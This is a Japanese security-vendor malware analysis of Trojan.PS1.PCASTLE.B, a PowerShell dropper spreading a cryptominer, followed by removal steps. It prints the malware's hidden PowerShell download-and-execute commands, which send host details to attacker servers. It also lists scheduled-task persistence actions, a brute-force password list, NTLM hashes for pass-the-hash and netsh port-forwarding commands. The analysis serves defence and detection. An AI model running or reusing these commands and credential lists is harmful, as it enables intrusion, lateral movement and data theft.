Trojan.PS1.PCASTLE.B
TrojanDownloader:PowerShell/Credcalper (MICROSOFT); HEUR:Trojan.PowerShell.Generic (KASPERSKY); Mal/PSDL-J (SOPHOS)
Windows

マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
なし
感染報告の有無 :
はい
概要
トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。
マルウェアは、ボット型マルウェア「Trojan.PS1.LUDICROUZ.A」によってダウンロードされる難読化されたPowerShellスクリプトです。このPowerShellスクリプトは、「Trojan.PS1.LUDICROUZ.A」のコンポーネントをダウンロードして実行するドロッパです。
マルウェアは、複数の拡散手法を使用して可能な限り多くのPCとサーバに仮想通貨発掘ツールを拡散する活動に関与しています。情報公開日時点で検出の多い国/地域は、中国、豪州、台湾、ベトナム、香港、インドです。
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
マルウェアは、特定の脆弱性を利用した感染活動を実行します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- %AppDataLocal%\kkk1.log
- %AppDataLocal%\pp2.log
- %AppDataLocal%\333.log
- %AppDataLocal%\kk4.log
- %AppDataLocal%\kk5.log
(註:%AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)
マルウェアは、以下のプロセスを追加します。
- powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" +
"&mac={MAC Address}&av={List of AV Products}&version={OS Version}&bit={OS Architecture}&flag2=
False&domain={Domain Name}&user={Username}&PS={If Powershell-Enabled}" + "')" + '""
マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。
- Global\powerv5
情報漏えい
マルウェアは、以下の情報を収集します。
- OS Version
- MAC Address
- List of AV products from the victim's machine
- OS Architecture
- Username
- Domain Name
その他
マルウェアは、以下の脆弱性を利用して感染活動を実行します。
<補足>
インストール
マルウェアは、以下のプロセスを追加します。
- powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" + "&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OSのバージョン}&bit={OSアーキテクチャ}&flag2= False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}" + "')" + '""
情報漏えい
マルウェアは、以下の情報を収集します。
- OSのバージョン
- MACアドレス
- セキュリティ対策製品の一覧(感染コンピュータから)
- OSのアーキテクチャ
- ユーザ名
- ドメイン名
その他
マルウェアは、以下を実行します。
- PingCastleスキャナを使用して、脆弱性を持つ攻撃対象コンピュータを特定する
- 以下の認証情報を使って辞書攻撃を実行する
- ユーザ名:
- administrator
- パスワード:
- 123456
- password
- PASSWORD
- football
- welcome
- 1
- 12
- 21
- 123
- 321
- 1234
- 12345
- 123123
- 123321
- 111111
- 654321
- 666666
- 121212
- 0
- 222222
- 888888
- 1111
- 555555
- 1234567
- 12345678
- 123456789
- 987654321
- admin
- abc123
- abcd1234
- abcd@1234
- abc@123
- p@ssword
- P@ssword
- p@ssw0rd
- P@ssw0rd
- P@SSWORD
- P@SSW0RD
- P@$$w0rd
- P@$$word
- P@$$w0rd
- iloveyou
- monkey
- login
- passw0rd
- master
- hello
- qazwsx
- password1
- qwerty
- baseball
- qwertyuiop
- superman
- 1qaz2wsx
- fuckyou
- 123qwe
- zxcvbn
- pass
- aaaaaa
- love
- administrator
- パスワードのハッシュ:
- 32ed87bdb5fdc5e9cba88547376818d4
- 8846f7eaee8fb117ad06bdd830b7586c
- 7b592e4f8178b4c75788531b2e747687
- 31fc0dc8f7dfad0e8bd7ccc3842f2ce9
- 674e48b68c5cd0efd8f7e5faa87b3d1e
- 69943c5e63b4d2c104dbbcc15138b72b
- 588feb889288fb953b5f094d47d1565c
- bcdf115fd9ba99336c31e176ee34b304
- 3dbde697d71690a769204beb12283678
- df54de3f3438343202c1dd523d0265be
- 7ce21f17c0aee7fb9ceba532d0546ad6
- 7a21990fcd3d759941e45c490f143d5f
- 579110c49145015c47ecd267657d3174
- af27efb60c7b238910efe2a7e0676a39
- 2d7f1a5a61d3a96fb5159b5eef17adc6
- 4057b60b514c5402dde3d29a1845c366
- e8cd0e4a9e89eab931dc5338fcbec54a
- 6920c58d0df184d829189c44fafb7ece
- 3fa45a060bd2693ae4c05b601d05ca0c
- ba07ba35933e5bf42dea4af8add09d1e
- f1351ac828428d74f6da2968089fc91f
- e84d037613721532e6b6d84d215854b6
- 2f2d544c53b3031f24d63402ea7fb4f9
- 328727b81ca05805a68ef26acb252039
- 259745cb123a52aa2e693aaacca2db52
- c22b315c040ae6e0efee3518d830362b
- 162e829be112225fedf856e38e1c65fe
- 209c6174da490caeb422f3fa5a7ae634
- f9e37e83b83c47a93c2f09f66408631b
- b3ec3e03e2a202cbd54fd104b8504fef
- 4ed91524cb54eaacc17a185646fb7491
- aa647b916a1fad374df9c30711d58a7a
- a80c9cc3f8439ada25af064a874efe2d
- 13b29964cc2480b4ef454c59562e675c
- de26cce0356891a4a020e7c4957afc72
- e19ccf75ee54e06b06a5907af13cef42
- 30fcaa8ad9a496b3e17f7fbfacc72993
- 41630abb825ca50da31ce1fac1e9f54d
- f56a8399599f1be040128b1dd9623c29
- 2e4dbf83aa056289935daea328977b20
- f56a8399599f1be040128b1dd9623c29
- b963c57010f218edc2cc3c229b5e4d0f
- f2477a144dff4f216ab81f2ac3e3207d
- e6bd4cdb1e447131b60418f31d0b81d6
- b9f917853e3dbf6e6831ecce60725930
- 6d3986e540a63647454a50e26477ef94
- 066ddfd4ef0e9cd7c256fe77191ef43c
- 152efbcfafeb22eabda8fc5e68697a41
- 5835048ce94ad0564e29a924a03510ef
- 2d20d252a479f485cdf5e171d93985bf
- 320a78179516c385e35a93ffa0b1c4ac
- 0d757ad173d2fc249ce19364fd64c8ec
- 72f5cfa80f07819ccbcfb72feb9eb9b7
- f67f5e3f66efd7298be6acd32eeeb27c
- 1c4ecc8938fb93812779077127e97662
- ad70819c5bc807280974d80f45982011
- a836ef24f0a529688be2af1479a95411
- 36aa83bdcab3c9fdaf321ca42a31c3fc
- acb98fd0478427cd18949050c5e87b47
- 85deeec2d12f917783b689ae94990716
- a4141712f19e9dd5adf16919bb38a95c
- ユーザ名:
- 以下のURLのコンテンツをダウンロードしてメモリ内で実行する
- http://p.{BLOCKED}h.com/upgrade.php?ver=3&mac={MACアドレス}&av={セキュリティ対策製品の一覧}
&ver={OSのバージョン}&bit={OSアーキテクチャ} - http://{BLOCKED}.{BLOCKED}.107.137/status.json?allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧} &version={OSのバージョン}&bit={OSアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS= {If Powershell-Enabled}&{感染の状況報告}&{マルウェアのディレクトリ\マルウェアのファイル名}
- http://p.{BLOCKED}h.com/upgrade.php?ver=3&mac={MACアドレス}&av={セキュリティ対策製品の一覧}
- 「pass the hash」攻撃を実行する。「pass the hash」攻撃に成功すると以下を実行する
- ファイル%User Startup%\run.batが存在する場合、削除する
- 以下のファイルを作成する
- %Application Data%\sign.txt
- %Application Data%\flashplayer.tmp
- %User Startup%\FlashPlayer.lnk
- 以下の作成されたログファイルの存在を確認し、ファイルが存在しない場合は活動を実行する
- kkk1.logが存在しない場合
- 管理者権限がある場合
- URL”http://v.{BLOCKED}h.net/g?h{'yyMMdd'の形式の感染日時}”に接続して、不正なコードをダウンロードして実行する
- スケジュールされたタスクを作成する
- タスク名: \Microsoft\windows\{MACアドレス}
- アクション: powershell -nop -ep bypass -e [http://v.y6h.net/g?h{'yyMMdd'の形式の感染日時}からの不正なコード]
- 上記以外の場合
- URL”http://v.{BLOCKED}h.net/g?h{'yyMMdd'の形式の感染日時}”に接続して、不正なコードをダウンロードして実行する
- スケジュールされたタスクを作成する
- タスク名: {MACアドレス}
- アクション: powershell -nop -ep bypass -e [http://v.{BLOCKED}h.net/g?l{'yyMMdd'の形式の感染日時}からの不正なコード]
- 管理者権限がある場合
- kkk1.logが存在しない場合
- pp2.logが存在しない場合
- ディレクトリの作成: %Application Data%\Microsoft
ファイル%Application Data%\ Microsoft \ cred.ps1の存在を確認し、存在しない場合、http://down.{BLOCKED}h.com/new.dat?allv5&mac={MACアドレス}&av={セキュリティ対対策製品の一覧}&version={OSのバージョン}&bit={OSのアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}に接続して、不正なファイルをダウンロードして、ファイル名%Application Data%\Microsoft\cred.ps1として保存する - スケジュールされたタスクを作成し実行する
- タスク名: Credentials
- アクション: powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
- ディレクトリの作成: %Application Data%\Microsoft
- 333.logが存在しない場合
- http://down.{BLOCKED}h.com/mn.dat?allv5&mac={MACアドレス}&av={セキュリティ対策製}&version={OSのバージョン}&bit={OS のアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}に接続して、不正なファイルをダウンロードし、ファイル名%AppDataLocal%\mn.exeとして保存する
- %AppDataLocal%\mn.exeの実行
- kk4.logが存在しない場合
- http://down.{BLOCKED}h.com/ii.dat?p=allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OS のバージョン}&bit={OS のアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled} に接続して、不正なファイルをダウンロードして、ファイル名%AppDataLocal%\{ランダムな4-8文字 }.exeとして保存する
- さらに
- 管理者権限がある場合
- スケジュールされたタスクを作成する
- タスク名: \Microsoft\Windows\{ランダムな4-8文字}
- Action: %AppDataLocal%\{ランダムな4-8文字}.exe
- スケジュールされたタスクを作成する
- 管理者権限でない場合
- ダウンロードしたファイルの自動実行に使用するスクリプトファイル%AppDataLocal%\ run.vbsを作成する
- スケジュールされたタスクを作成する
- タスク名: {ランダムな4-8文字}
- アクション: %AppDataLocal%\run.vbs
- kk5.logが存在しない場合
- http://down.{BLOCKED}h.com/ddd.dat?allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OSのバージョン}&bit={OSのアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled} に接続し、不正なファイルをダウンロードしてファイル名%AppDataLocal%\ddd.exeとして保存する
- %AppDataLocal%\ddd.exeの実行
- 管理者権限がある場合
- 辞書攻撃に成功すると、マルウェアは、以下を実行する
- 以下のプロセスを実行する
- netsh.exe firewall add portopening tcp 65533 DNS
- netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
- スケジュールされたタスクを作成する
- タスク名: \Microsoft\windows\Bluetooths
- アクション: powershell -nop -ep bypass -e {base64でエンコードされたコマンド}
- 以下のプロセスを実行する
対応方法
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
「Trojan.PS1.PCASTLE.B」で検出したファイル名を確認し、そのファイルを終了します。
- すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
- 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
セーフモードについては、こちらをご参照下さい。 - 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。
手順 4
スケジュールされたタスクを削除する
タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。
- \Microsoft\windows\{MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?h{date of infection in the format 'yyMMdd'}]
- {MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?l{date of infection in the format 'yyMMdd'}]
- Credentials - powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
- \Microsoft\Windows\{random 4-8 characters} - %AppDataLocal%\{random 4-8 characters}.exe
- {random 4-8 characters} - %AppDataLocal%\run.vbs
- \Microsoft\windows\Bluetooths - powershell -nop -ep bypass -e {base64-encoded command}
Windows 2000、Windows XP、Windows Server 2003の場合:
- [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
- 上記の{タスク名} を、[名前]の欄に入力します。
- 入力した{タスク名} 持つファイルを右クリックします。
- [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
- 上記の{実行するタスク}と文字列が一致するタスクを削除します。
Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:
- Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。 - 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
- 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
- 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
- 文字列が一致するタスクを削除します。
手順 5
以下のファイルを検索し削除します。
- %AppDataLocal%\kkk1.log
- %AppDataLocal%\pp2.log
- %AppDataLocal%\333.log
- %AppDataLocal%\kk4.log
- %AppDataLocal%\kk5.log
- %AppDataLocal%\mn.exe
- %AppDataLocal%\{random 4-8 characters}.exe
- %AppDataLocal%\run.vbs
- %AppDataLocal%\ddd.exe
- %Application Data%\sign.txt
- %Application Data%\flashplayer.tmp
- %Application Data%\Microsoft\cred.ps1
- %User Startup%\FlashPlayer.lnk
手順 6
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.PS1.PCASTLE.B」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください